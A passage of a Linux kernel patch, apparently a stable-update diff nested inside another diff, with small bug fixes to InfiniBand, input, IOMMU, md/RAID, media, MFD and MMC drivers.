+ 	hns_roce_destroy_cq(cq, NULL);
+ 	kfree(cq);
+ 
+@@ -5791,7 +5795,7 @@ static int hns_roce_v2_modify_srq(struct ib_srq *ibsrq,
+ 
+ 	/* Resizing SRQs is not supported yet */
+ 	if (srq_attr_mask & IB_SRQ_MAX_WR)
+-		return -EINVAL;
++		return -EOPNOTSUPP;
+ 
+ 	if (srq_attr_mask & IB_SRQ_LIMIT) {
+ 		if (srq_attr->srq_limit > srq->wqe_cnt)
+diff --git a/drivers/infiniband/hw/hns/hns_roce_pd.c b/drivers/infiniband/hw/hns/hns_roce_pd.c
+index 783e71852c503..bd1fe89ca205e 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_pd.c
++++ b/drivers/infiniband/hw/hns/hns_roce_pd.c
+@@ -150,7 +150,7 @@ int hns_roce_alloc_xrcd(struct ib_xrcd *ib_xrcd, struct ib_udata *udata)
+ 	int ret;
+ 
+ 	if (!(hr_dev->caps.flags & HNS_ROCE_CAP_FLAG_XRC))
+-		return -EINVAL;
++		return -EOPNOTSUPP;
+ 
+ 	ret = hns_roce_xrcd_alloc(hr_dev, &xrcd->xrcdn);
+ 	if (ret)
+diff --git a/drivers/infiniband/hw/mthca/mthca_cmd.c b/drivers/infiniband/hw/mthca/mthca_cmd.c
+index f330ce895d884..8fe0cef7e2be6 100644
+--- a/drivers/infiniband/hw/mthca/mthca_cmd.c
++++ b/drivers/infiniband/hw/mthca/mthca_cmd.c
+@@ -635,7 +635,7 @@ void mthca_free_mailbox(struct mthca_dev *dev, struct mthca_mailbox *mailbox)
+ 
+ int mthca_SYS_EN(struct mthca_dev *dev)
+ {
+-	u64 out;
++	u64 out = 0;
+ 	int ret;
+ 
+ 	ret = mthca_cmd_imm(dev, 0, &out, 0, 0, CMD_SYS_EN, CMD_TIME_CLASS_D);
+@@ -1955,7 +1955,7 @@ int mthca_WRITE_MGM(struct mthca_dev *dev, int index,
+ int mthca_MGID_HASH(struct mthca_dev *dev, struct mthca_mailbox *mailbox,
+ 		    u16 *hash)
+ {
+-	u64 imm;
++	u64 imm = 0;
+ 	int err;
+ 
+ 	err = mthca_cmd_imm(dev, mailbox->dma, &imm, 0, 0, CMD_MGID_HASH,
+diff --git a/drivers/infiniband/hw/mthca/mthca_main.c b/drivers/infiniband/hw/mthca/mthca_main.c
+index b54bc8865daec..1ab268b770968 100644
+--- a/drivers/infiniband/hw/mthca/mthca_main.c
++++ b/drivers/infiniband/hw/mthca/mthca_main.c
+@@ -382,7 +382,7 @@ static int mthca_init_icm(struct mthca_dev *mdev,
+ 			  struct mthca_init_hca_param *init_hca,
+ 			  u64 icm_size)
+ {
+-	u64 aux_pages;
++	u64 aux_pages = 0;
+ 	int err;
+ 
+ 	err = mthca_SET_ICM_SIZE(mdev, icm_size, &aux_pages);
+diff --git a/drivers/infiniband/ulp/iser/iscsi_iser.h b/drivers/infiniband/ulp/iser/iscsi_iser.h
+index dee8c97ff0568..d967d55324596 100644
+--- a/drivers/infiniband/ulp/iser/iscsi_iser.h
++++ b/drivers/infiniband/ulp/iser/iscsi_iser.h
+@@ -317,12 +317,10 @@ struct iser_device {
+  *
+  * @mr:         memory region
+  * @sig_mr:     signature memory region
+- * @mr_valid:   is mr valid indicator
+  */
+ struct iser_reg_resources {
+ 	struct ib_mr                     *mr;
+ 	struct ib_mr                     *sig_mr;
+-	u8				  mr_valid:1;
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/ulp/iser/iser_initiator.c b/drivers/infiniband/ulp/iser/iser_initiator.c
+index 7b83f48f60c5e..8ec470c519e82 100644
+--- a/drivers/infiniband/ulp/iser/iser_initiator.c
++++ b/drivers/infiniband/ulp/iser/iser_initiator.c
+@@ -580,7 +580,10 @@ static inline int iser_inv_desc(struct iser_fr_desc *desc, u32 rkey)
+ 		return -EINVAL;
+ 	}
+ 
+-	desc->rsc.mr_valid = 0;
++	if (desc->sig_protected)
++		desc->rsc.sig_mr->need_inval = false;
++	else
++		desc->rsc.mr->need_inval = false;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/ulp/iser/iser_memory.c b/drivers/infiniband/ulp/iser/iser_memory.c
+index 29ae2c6a250a3..6efcb79c8efe3 100644
+--- a/drivers/infiniband/ulp/iser/iser_memory.c
++++ b/drivers/infiniband/ulp/iser/iser_memory.c
+@@ -264,7 +264,7 @@ static int iser_reg_sig_mr(struct iscsi_iser_task *iser_task,
+ 
+ 	iser_set_prot_checks(iser_task->sc, &sig_attrs->check_mask);
+ 
+-	if (rsc->mr_valid)
++	if (rsc->sig_mr->need_inval)
+ 		iser_inv_rkey(&tx_desc->inv_wr, mr, cqe, &wr->wr);
+ 
+ 	ib_update_fast_reg_key(mr, ib_inc_rkey(mr->rkey));
+@@ -288,7 +288,7 @@ static int iser_reg_sig_mr(struct iscsi_iser_task *iser_task,
+ 	wr->access = IB_ACCESS_LOCAL_WRITE |
+ 		     IB_ACCESS_REMOTE_READ |
+ 		     IB_ACCESS_REMOTE_WRITE;
+-	rsc->mr_valid = 1;
++	rsc->sig_mr->need_inval = true;
+ 
+ 	sig_reg->sge.lkey = mr->lkey;
+ 	sig_reg->rkey = mr->rkey;
+@@ -313,7 +313,7 @@ static int iser_fast_reg_mr(struct iscsi_iser_task *iser_task,
+ 	struct ib_reg_wr *wr = &tx_desc->reg_wr;
+ 	int n;
+ 
+-	if (rsc->mr_valid)
++	if (rsc->mr->need_inval)
+ 		iser_inv_rkey(&tx_desc->inv_wr, mr, cqe, &wr->wr);
+ 
+ 	ib_update_fast_reg_key(mr, ib_inc_rkey(mr->rkey));
+@@ -336,7 +336,7 @@ static int iser_fast_reg_mr(struct iscsi_iser_task *iser_task,
+ 		     IB_ACCESS_REMOTE_WRITE |
+ 		     IB_ACCESS_REMOTE_READ;
+ 
+-	rsc->mr_valid = 1;
++	rsc->mr->need_inval = true;
+ 
+ 	reg->sge.lkey = mr->lkey;
+ 	reg->rkey = mr->rkey;
+diff --git a/drivers/infiniband/ulp/iser/iser_verbs.c b/drivers/infiniband/ulp/iser/iser_verbs.c
+index a00ca117303a9..057e69164e6d7 100644
+--- a/drivers/infiniband/ulp/iser/iser_verbs.c
++++ b/drivers/infiniband/ulp/iser/iser_verbs.c
+@@ -135,7 +135,6 @@ iser_create_fastreg_desc(struct iser_device *device,
+ 			goto err_alloc_mr_integrity;
+ 		}
+ 	}
+-	desc->rsc.mr_valid = 0;
+ 
+ 	return desc;
+ 
+diff --git a/drivers/input/keyboard/atkbd.c b/drivers/input/keyboard/atkbd.c
+index e1e4f1133296a..c4d8caadec59e 100644
+--- a/drivers/input/keyboard/atkbd.c
++++ b/drivers/input/keyboard/atkbd.c
+@@ -772,9 +772,9 @@ static bool atkbd_is_portable_device(void)
+  * not work. So in this case simply assume a keyboard is connected to avoid
+  * confusing some laptop keyboards.
+  *
+- * Skipping ATKBD_CMD_GETID ends up using a fake keyboard id. Using a fake id is
+- * ok in translated mode, only atkbd_select_set() checks atkbd->id and in
+- * translated mode that is a no-op.
++ * Skipping ATKBD_CMD_GETID ends up using a fake keyboard id. Using the standard
++ * 0xab83 id is ok in translated mode, only atkbd_select_set() checks atkbd->id
++ * and in translated mode that is a no-op.
+  */
+ static bool atkbd_skip_getid(struct atkbd *atkbd)
+ {
+@@ -792,6 +792,7 @@ static int atkbd_probe(struct atkbd *atkbd)
+ {
+ 	struct ps2dev *ps2dev = &atkbd->ps2dev;
+ 	unsigned char param[2];
++	bool skip_getid;
+ 
+ /*
+  * Some systems, where the bit-twiddling when testing the io-lines of the
+@@ -813,7 +814,8 @@ static int atkbd_probe(struct atkbd *atkbd)
+  */
+ 
+ 	param[0] = param[1] = 0xa5;	/* initialize with invalid values */
+-	if (atkbd_skip_getid(atkbd) || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
++	skip_getid = atkbd_skip_getid(atkbd);
++	if (skip_getid || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
+ 
+ /*
+  * If the get ID command was skipped or failed, we check if we can at least set
+@@ -823,7 +825,7 @@ static int atkbd_probe(struct atkbd *atkbd)
+ 		param[0] = 0;
+ 		if (ps2_command(ps2dev, param, ATKBD_CMD_SETLEDS))
+ 			return -1;
+-		atkbd->id = 0xabba;
++		atkbd->id = skip_getid ? 0xab83 : 0xabba;
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+index b2708de25ea34..d80065c8105af 100644
+--- a/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
++++ b/drivers/iommu/arm/arm-smmu/arm-smmu-qcom.c
+@@ -243,6 +243,7 @@ static int qcom_adreno_smmu_init_context(struct arm_smmu_domain *smmu_domain,
+ 
+ static const struct of_device_id qcom_smmu_client_of_match[] __maybe_unused = {
+ 	{ .compatible = "qcom,adreno" },
++	{ .compatible = "qcom,adreno-gmu" },
+ 	{ .compatible = "qcom,mdp4" },
+ 	{ .compatible = "qcom,mdss" },
+ 	{ .compatible = "qcom,sc7180-mdss" },
+diff --git a/drivers/iommu/dma-iommu.c b/drivers/iommu/dma-iommu.c
+index 9297b741f5e80..aa6d62cc567ae 100644
+--- a/drivers/iommu/dma-iommu.c
++++ b/drivers/iommu/dma-iommu.c
+@@ -28,6 +28,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/swiotlb.h>
+ #include <linux/vmalloc.h>
++#include <trace/events/swiotlb.h>
+ 
+ #include "dma-iommu.h"
+ 
+@@ -999,6 +1000,8 @@ static dma_addr_t iommu_dma_map_page(struct device *dev, struct page *page,
+ 			return DMA_MAPPING_ERROR;
+ 		}
+ 
++		trace_swiotlb_bounced(dev, phys, size);
++
+ 		aligned_size = iova_align(iovad, size);
+ 		phys = swiotlb_tbl_map_single(dev, phys, size, aligned_size,
+ 					      iova_mask(iovad), dir, attrs);
+diff --git a/drivers/leds/Kconfig b/drivers/leds/Kconfig
+index 2378cfb7443e4..509d03eb3e8d6 100644
+--- a/drivers/leds/Kconfig
++++ b/drivers/leds/Kconfig
+@@ -97,6 +97,7 @@ config LEDS_ARIEL
+ config LEDS_AW2013
+ 	tristate "LED support for Awinic AW2013"
+ 	depends on LEDS_CLASS && I2C && OF
++	select REGMAP_I2C
+ 	help
+ 	  This option enables support for the AW2013 3-channel
+ 	  LED driver.
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 0c2801d770901..6120f26a79696 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -528,6 +528,9 @@ static void md_end_flush(struct bio *bio)
+ 	rdev_dec_pending(rdev, mddev);
+ 
+ 	if (atomic_dec_and_test(&mddev->flush_pending)) {
++		/* The pair is percpu_ref_get() from md_flush_request() */
++		percpu_ref_put(&mddev->active_io);
++
+ 		/* The pre-request flush has finished */
+ 		queue_work(md_wq, &mddev->flush_work);
+ 	}
+@@ -547,12 +550,8 @@ static void submit_flushes(struct work_struct *ws)
+ 	rdev_for_each_rcu(rdev, mddev)
+ 		if (rdev->raid_disk >= 0 &&
+ 		    !test_bit(Faulty, &rdev->flags)) {
+-			/* Take two references, one is dropped
+-			 * when request finishes, one after
+-			 * we reclaim rcu_read_lock
+-			 */
+ 			struct bio *bi;
+-			atomic_inc(&rdev->nr_pending);
++
+ 			atomic_inc(&rdev->nr_pending);
+ 			rcu_read_unlock();
+ 			bi = bio_alloc_bioset(rdev->bdev, 0,
+@@ -563,7 +562,6 @@ static void submit_flushes(struct work_struct *ws)
+ 			atomic_inc(&mddev->flush_pending);
+ 			submit_bio(bi);
+ 			rcu_read_lock();
+-			rdev_dec_pending(rdev, mddev);
+ 		}
+ 	rcu_read_unlock();
+ 	if (atomic_dec_and_test(&mddev->flush_pending))
+@@ -616,6 +614,18 @@ bool md_flush_request(struct mddev *mddev, struct bio *bio)
+ 	/* new request after previous flush is completed */
+ 	if (ktime_after(req_start, mddev->prev_flush_start)) {
+ 		WARN_ON(mddev->flush_bio);
++		/*
++		 * Grab a reference to make sure mddev_suspend() will wait for
++		 * this flush to be done.
++		 *
++		 * md_flush_reqeust() is called under md_handle_request() and
++		 * 'active_io' is already grabbed, hence percpu_ref_is_zero()
++		 * won't pass, percpu_ref_tryget_live() can't be used because
++		 * percpu_ref_kill() can be called by mddev_suspend()
++		 * concurrently.
++		 */
++		WARN_ON(percpu_ref_is_zero(&mddev->active_io));
++		percpu_ref_get(&mddev->active_io);
+ 		mddev->flush_bio = bio;
+ 		bio = NULL;
+ 	}
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index 30f906a67def4..76f7ca53d8123 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -1972,12 +1972,12 @@ static void end_sync_write(struct bio *bio)
+ }
+ 
+ static int r1_sync_page_io(struct md_rdev *rdev, sector_t sector,
+-			   int sectors, struct page *page, int rw)
++			   int sectors, struct page *page, blk_opf_t rw)
+ {
+ 	if (sync_page_io(rdev, sector, sectors << 9, page, rw, false))
+ 		/* success */
+ 		return 1;
+-	if (rw == WRITE) {
++	if (rw == REQ_OP_WRITE) {
+ 		set_bit(WriteErrorSeen, &rdev->flags);
+ 		if (!test_and_set_bit(WantReplacement,
+ 				      &rdev->flags))
+@@ -2094,7 +2094,7 @@ static int fix_sync_read_error(struct r1bio *r1_bio)
+ 			rdev = conf->mirrors[d].rdev;
+ 			if (r1_sync_page_io(rdev, sect, s,
+ 					    pages[idx],
+-					    WRITE) == 0) {
++					    REQ_OP_WRITE) == 0) {
+ 				r1_bio->bios[d]->bi_end_io = NULL;
+ 				rdev_dec_pending(rdev, mddev);
+ 			}
+@@ -2109,7 +2109,7 @@ static int fix_sync_read_error(struct r1bio *r1_bio)
+ 			rdev = conf->mirrors[d].rdev;
+ 			if (r1_sync_page_io(rdev, sect, s,
+ 					    pages[idx],
+-					    READ) != 0)
++					    REQ_OP_READ) != 0)
+ 				atomic_add(s, &rdev->corrected_errors);
+ 		}
+ 		sectors -= s;
+@@ -2321,7 +2321,7 @@ static void fix_read_error(struct r1conf *conf, int read_disk,
+ 				atomic_inc(&rdev->nr_pending);
+ 				rcu_read_unlock();
+ 				r1_sync_page_io(rdev, sect, s,
+-						conf->tmppage, WRITE);
++						conf->tmppage, REQ_OP_WRITE);
+ 				rdev_dec_pending(rdev, mddev);
+ 			} else
+ 				rcu_read_unlock();
+@@ -2338,7 +2338,7 @@ static void fix_read_error(struct r1conf *conf, int read_disk,
+ 				atomic_inc(&rdev->nr_pending);
+ 				rcu_read_unlock();
+ 				if (r1_sync_page_io(rdev, sect, s,
+-						    conf->tmppage, READ)) {
++						conf->tmppage, REQ_OP_READ)) {
+ 					atomic_add(s, &rdev->corrected_errors);
+ 					pr_info("md/raid1:%s: read error corrected (%d sectors at %llu on %pg)\n",
+ 						mdname(mddev), s,
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index f7783199f81d4..e4564ca1f2434 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -36,6 +36,7 @@
+  */
+ 
+ #include <linux/blkdev.h>
++#include <linux/delay.h>
+ #include <linux/kthread.h>
+ #include <linux/raid/pq.h>
+ #include <linux/async_tx.h>
+@@ -6832,7 +6833,18 @@ static void raid5d(struct md_thread *thread)
+ 			spin_unlock_irq(&conf->device_lock);
+ 			md_check_recovery(mddev);
+ 			spin_lock_irq(&conf->device_lock);
++
++			/*
++			 * Waiting on MD_SB_CHANGE_PENDING below may deadlock
++			 * seeing md_check_recovery() is needed to clear
++			 * the flag when using mdmon.
++			 */
++			continue;
+ 		}
++
++		wait_event_lock_irq(mddev->sb_wait,
++			!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags),
++			conf->device_lock);
+ 	}
+ 	pr_debug("%d stripes handled\n", handled);
+ 
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index 9f9a976527080..d352e028491aa 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -104,6 +104,8 @@ static int dvb_device_open(struct inode *inode, struct file *file)
+ 			err = file->f_op->open(inode, file);
+ 		up_read(&minor_rwsem);
+ 		mutex_unlock(&dvbdev_mutex);
++		if (err)
++			dvb_device_put(dvbdev);
+ 		return err;
+ 	}
+ fail:
+diff --git a/drivers/media/dvb-frontends/m88ds3103.c b/drivers/media/dvb-frontends/m88ds3103.c
+index 9a0d43c7ba9e0..ce99f7dfb5a5e 100644
+--- a/drivers/media/dvb-frontends/m88ds3103.c
++++ b/drivers/media/dvb-frontends/m88ds3103.c
+@@ -1894,7 +1894,7 @@ static int m88ds3103_probe(struct i2c_client *client,
+ 		/* get frontend address */
+ 		ret = regmap_read(dev->regmap, 0x29, &utmp);
+ 		if (ret)
+-			goto err_kfree;
++			goto err_del_adapters;
+ 		dev->dt_addr = ((utmp & 0x80) == 0) ? 0x42 >> 1 : 0x40 >> 1;
+ 		dev_dbg(&client->dev, "dt addr is 0x%02x\n", dev->dt_addr);
+ 
+@@ -1902,11 +1902,14 @@ static int m88ds3103_probe(struct i2c_client *client,
+ 						      dev->dt_addr);
+ 		if (IS_ERR(dev->dt_client)) {
+ 			ret = PTR_ERR(dev->dt_client);
+-			goto err_kfree;
++			goto err_del_adapters;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++err_del_adapters:
++	i2c_mux_del_adapters(dev->muxc);
+ err_kfree:
+ 	kfree(dev);
+ err:
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index e9a4f8abd21c5..3071b61946c3b 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -1412,7 +1412,6 @@ static int mtk_jpeg_remove(struct platform_device *pdev)
+ {
+ 	struct mtk_jpeg_dev *jpeg = platform_get_drvdata(pdev);
+ 
+-	cancel_delayed_work_sync(&jpeg->job_timeout_work);
+ 	pm_runtime_disable(&pdev->dev);
+ 	video_unregister_device(jpeg->vdev);
+ 	v4l2_m2m_release(jpeg->m2m_dev);
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c
+index afbbfd5d02bcc..6d200e23754e8 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_dec_hw.c
+@@ -188,6 +188,7 @@ int mtk_jpeg_dec_fill_param(struct mtk_jpeg_dec_param *param)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_fill_param);
+ 
+ u32 mtk_jpeg_dec_get_int_status(void __iomem *base)
+ {
+@@ -199,6 +200,7 @@ u32 mtk_jpeg_dec_get_int_status(void __iomem *base)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_get_int_status);
+ 
+ u32 mtk_jpeg_dec_enum_result(u32 irq_result)
+ {
+@@ -215,11 +217,13 @@ u32 mtk_jpeg_dec_enum_result(u32 irq_result)
+ 
+ 	return MTK_JPEG_DEC_RESULT_ERROR_UNKNOWN;
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_enum_result);
+ 
+ void mtk_jpeg_dec_start(void __iomem *base)
+ {
+ 	writel(0, base + JPGDEC_REG_TRIG);
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_start);
+ 
+ static void mtk_jpeg_dec_soft_reset(void __iomem *base)
+ {
+@@ -239,6 +243,7 @@ void mtk_jpeg_dec_reset(void __iomem *base)
+ 	mtk_jpeg_dec_soft_reset(base);
+ 	mtk_jpeg_dec_hard_reset(base);
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_reset);
+ 
+ static void mtk_jpeg_dec_set_brz_factor(void __iomem *base, u8 yscale_w,
+ 					u8 yscale_h, u8 uvscale_w, u8 uvscale_h)
+@@ -407,3 +412,4 @@ void mtk_jpeg_dec_set_config(void __iomem *base,
+ 				   config->dma_last_mcu);
+ 	mtk_jpeg_dec_set_pause_mcu_idx(base, config->total_mcu);
+ }
++EXPORT_SYMBOL_GPL(mtk_jpeg_dec_set_config);
+diff --git a/drivers/media/platform/nxp/imx-mipi-csis.c b/drivers/media/platform/nxp/imx-mipi-csis.c
+index 905072871ed2e..196f2bba419f9 100644
+--- a/drivers/media/platform/nxp/imx-mipi-csis.c
++++ b/drivers/media/platform/nxp/imx-mipi-csis.c
+@@ -1553,8 +1553,10 @@ static int mipi_csis_remove(struct platform_device *pdev)
+ 	v4l2_async_nf_cleanup(&csis->notifier);
+ 	v4l2_async_unregister_subdev(&csis->sd);
+ 
++	if (!pm_runtime_enabled(&pdev->dev))
++		mipi_csis_runtime_suspend(&pdev->dev);
++
+ 	pm_runtime_disable(&pdev->dev);
+-	mipi_csis_runtime_suspend(&pdev->dev);
+ 	mipi_csis_clk_disable(csis);
+ 	media_entity_cleanup(&csis->sd.entity);
+ 	fwnode_handle_put(csis->sd.fwnode);
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index f2475c6235ea7..2b76339f9381c 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -582,7 +582,7 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 
+ 	ret = v4l2_device_register(rkisp1->dev, &rkisp1->v4l2_dev);
+ 	if (ret)
+-		goto err_pm_runtime_disable;
++		goto err_media_dev_cleanup;
+ 
+ 	ret = media_device_register(&rkisp1->media_dev);
+ 	if (ret) {
+@@ -617,6 +617,8 @@ err_unreg_media_dev:
+ 	media_device_unregister(&rkisp1->media_dev);
+ err_unreg_v4l2_dev:
+ 	v4l2_device_unregister(&rkisp1->v4l2_dev);
++err_media_dev_cleanup:
++	media_device_cleanup(&rkisp1->media_dev);
+ err_pm_runtime_disable:
+ 	pm_runtime_disable(&pdev->dev);
+ 	return ret;
+@@ -637,6 +639,8 @@ static int rkisp1_remove(struct platform_device *pdev)
+ 	media_device_unregister(&rkisp1->media_dev);
+ 	v4l2_device_unregister(&rkisp1->v4l2_dev);
+ 
++	media_device_cleanup(&rkisp1->media_dev);
++
+ 	pm_runtime_disable(&pdev->dev);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/verisilicon/hantro_drv.c b/drivers/media/platform/verisilicon/hantro_drv.c
+index 08840ba313e7a..69a2442f31223 100644
+--- a/drivers/media/platform/verisilicon/hantro_drv.c
++++ b/drivers/media/platform/verisilicon/hantro_drv.c
+@@ -813,6 +813,8 @@ static int hantro_add_func(struct hantro_dev *vpu, unsigned int funcid)
+ 
+ 	if (funcid == MEDIA_ENT_F_PROC_VIDEO_ENCODER) {
+ 		vpu->encoder = func;
++		v4l2_disable_ioctl(vfd, VIDIOC_TRY_DECODER_CMD);
++		v4l2_disable_ioctl(vfd, VIDIOC_DECODER_CMD);
+ 	} else {
+ 		vpu->decoder = func;
+ 		v4l2_disable_ioctl(vfd, VIDIOC_TRY_ENCODER_CMD);
+diff --git a/drivers/media/platform/verisilicon/hantro_v4l2.c b/drivers/media/platform/verisilicon/hantro_v4l2.c
+index 30e650edaea8a..b2da48936e3f1 100644
+--- a/drivers/media/platform/verisilicon/hantro_v4l2.c
++++ b/drivers/media/platform/verisilicon/hantro_v4l2.c
+@@ -759,6 +759,9 @@ const struct v4l2_ioctl_ops hantro_ioctl_ops = {
+ 	.vidioc_g_selection = vidioc_g_selection,
+ 	.vidioc_s_selection = vidioc_s_selection,
+ 
++	.vidioc_decoder_cmd = v4l2_m2m_ioctl_stateless_decoder_cmd,
++	.vidioc_try_decoder_cmd = v4l2_m2m_ioctl_stateless_try_decoder_cmd,
++
+ 	.vidioc_try_encoder_cmd = v4l2_m2m_ioctl_try_encoder_cmd,
+ 	.vidioc_encoder_cmd = vidioc_encoder_cmd,
+ };
+diff --git a/drivers/media/usb/cx231xx/cx231xx-core.c b/drivers/media/usb/cx231xx/cx231xx-core.c
+index 727e6268567f7..f1feccc28bf05 100644
+--- a/drivers/media/usb/cx231xx/cx231xx-core.c
++++ b/drivers/media/usb/cx231xx/cx231xx-core.c
+@@ -1024,6 +1024,7 @@ int cx231xx_init_isoc(struct cx231xx *dev, int max_packets,
+ 	if (!dev->video_mode.isoc_ctl.urb) {
+ 		dev_err(dev->dev,
+ 			"cannot alloc memory for usb buffers\n");
++		kfree(dma_q->p_left_data);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -1033,6 +1034,7 @@ int cx231xx_init_isoc(struct cx231xx *dev, int max_packets,
+ 		dev_err(dev->dev,
+ 			"cannot allocate memory for usbtransfer\n");
+ 		kfree(dev->video_mode.isoc_ctl.urb);
++		kfree(dma_q->p_left_data);
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-context.c b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+index 14170a5d72b35..1764674de98bc 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-context.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+@@ -268,7 +268,8 @@ void pvr2_context_disconnect(struct pvr2_context *mp)
+ {
+ 	pvr2_hdw_disconnect(mp->hdw);
+ 	mp->disconnect_flag = !0;
+-	pvr2_context_notify(mp);
++	if (!pvr2_context_shutok())
++		pvr2_context_notify(mp);
+ }
+ 
+ 
+diff --git a/drivers/mfd/intel-lpss.c b/drivers/mfd/intel-lpss.c
+index cfbee2cfba6b0..c50387600b819 100644
+--- a/drivers/mfd/intel-lpss.c
++++ b/drivers/mfd/intel-lpss.c
+@@ -301,8 +301,8 @@ static int intel_lpss_register_clock_divider(struct intel_lpss *lpss,
+ 
+ 	snprintf(name, sizeof(name), "%s-div", devname);
+ 	tmp = clk_register_fractional_divider(NULL, name, __clk_get_name(tmp),
++					      0, lpss->priv, 1, 15, 16, 15,
+ 					      CLK_FRAC_DIVIDER_POWER_OF_TWO_PS,
+-					      lpss->priv, 1, 15, 16, 15, 0,
+ 					      NULL);
+ 	if (IS_ERR(tmp))
+ 		return PTR_ERR(tmp);
+diff --git a/drivers/mfd/syscon.c b/drivers/mfd/syscon.c
+index bdb2ce7ff03b9..6196724ef39bb 100644
+--- a/drivers/mfd/syscon.c
++++ b/drivers/mfd/syscon.c
+@@ -102,6 +102,10 @@ static struct syscon *of_syscon_register(struct device_node *np, bool check_clk)
+ 	}
+ 
+ 	syscon_config.name = kasprintf(GFP_KERNEL, "%pOFn@%pa", np, &res.start);
++	if (!syscon_config.name) {
++		ret = -ENOMEM;
++		goto err_regmap;
++	}
+ 	syscon_config.reg_stride = reg_io_width;
+ 	syscon_config.val_bits = reg_io_width * 8;
+ 	syscon_config.max_register = resource_size(&res) - reg_io_width;
+diff --git a/drivers/misc/habanalabs/common/habanalabs_ioctl.c b/drivers/misc/habanalabs/common/habanalabs_ioctl.c
+index 43afe40966e50..1ea1ae34b7a74 100644
+--- a/drivers/misc/habanalabs/common/habanalabs_ioctl.c
++++ b/drivers/misc/habanalabs/common/habanalabs_ioctl.c
+@@ -677,7 +677,7 @@ static int sec_attest_info(struct hl_fpriv *hpriv, struct hl_info_args *args)
+ 	if (!sec_attest_info)
+ 		return -ENOMEM;
+ 
+-	info = kmalloc(sizeof(*info), GFP_KERNEL);
++	info = kzalloc(sizeof(*info), GFP_KERNEL);
+ 	if (!info) {
+ 		rc = -ENOMEM;
+ 		goto free_sec_attest_info;
+diff --git a/drivers/mmc/host/Kconfig b/drivers/mmc/host/Kconfig
+index 9b5a2cb110b3e..d84bdb69f56b0 100644
+--- a/drivers/mmc/host/Kconfig
++++ b/drivers/mmc/host/Kconfig
+@@ -1061,14 +1061,15 @@ config MMC_SDHCI_XENON
+ 
+ config MMC_SDHCI_OMAP
+ 	tristate "TI SDHCI Controller Support"
++	depends on ARCH_OMAP2PLUS || ARCH_KEYSTONE || COMPILE_TEST
+ 	depends on MMC_SDHCI_PLTFM && OF
+ 	select THERMAL
+ 	imply TI_SOC_THERMAL
+ 	select MMC_SDHCI_EXTERNAL_DMA if DMA_ENGINE
+ 	help
+ 	  This selects the Secure Digital Host Controller Interface (SDHCI)
+-	  support present in TI's DRA7 SOCs. The controller supports
+-	  SD/MMC/SDIO devices.
++	  support present in TI's Keystone/OMAP2+/DRA7 SOCs. The controller
++	  supports SD/MMC/SDIO devices.
+ 
+ 	  If you have a controller with this interface, say Y or M here.
+ 
+@@ -1076,14 +1077,15 @@ config MMC_SDHCI_OMAP
+ 
+ config MMC_SDHCI_AM654
+ 	tristate "Support for the SDHCI Controller in TI's AM654 SOCs"
++	depends on ARCH_K3 || COMPILE_TEST
+ 	depends on MMC_SDHCI_PLTFM && OF
+ 	select MMC_SDHCI_IO_ACCESSORS
+ 	select MMC_CQHCI
+ 	select REGMAP_MMIO
+ 	help
+ 	  This selects the Secure Digital Host Controller Interface (SDHCI)
+-	  support present in TI's AM654 SOCs. The controller supports
+-	  SD/MMC/SDIO devices.
++	  support present in TI's AM65x/AM64x/AM62x/J721E SOCs. The controller
++	  supports SD/MMC/SDIO devices.
+ 
+ 	  If you have a controller with this interface, say Y or M here.
+ 
+diff --git a/drivers/mtd/mtd_blkdevs.c b/drivers/mtd/mtd_blkdevs.c
+index 60b222799871e..8ee60605a6dcc 100644
+--- a/drivers/mtd/mtd_blkdevs.c
++++ b/drivers/mtd/mtd_blkdevs.c
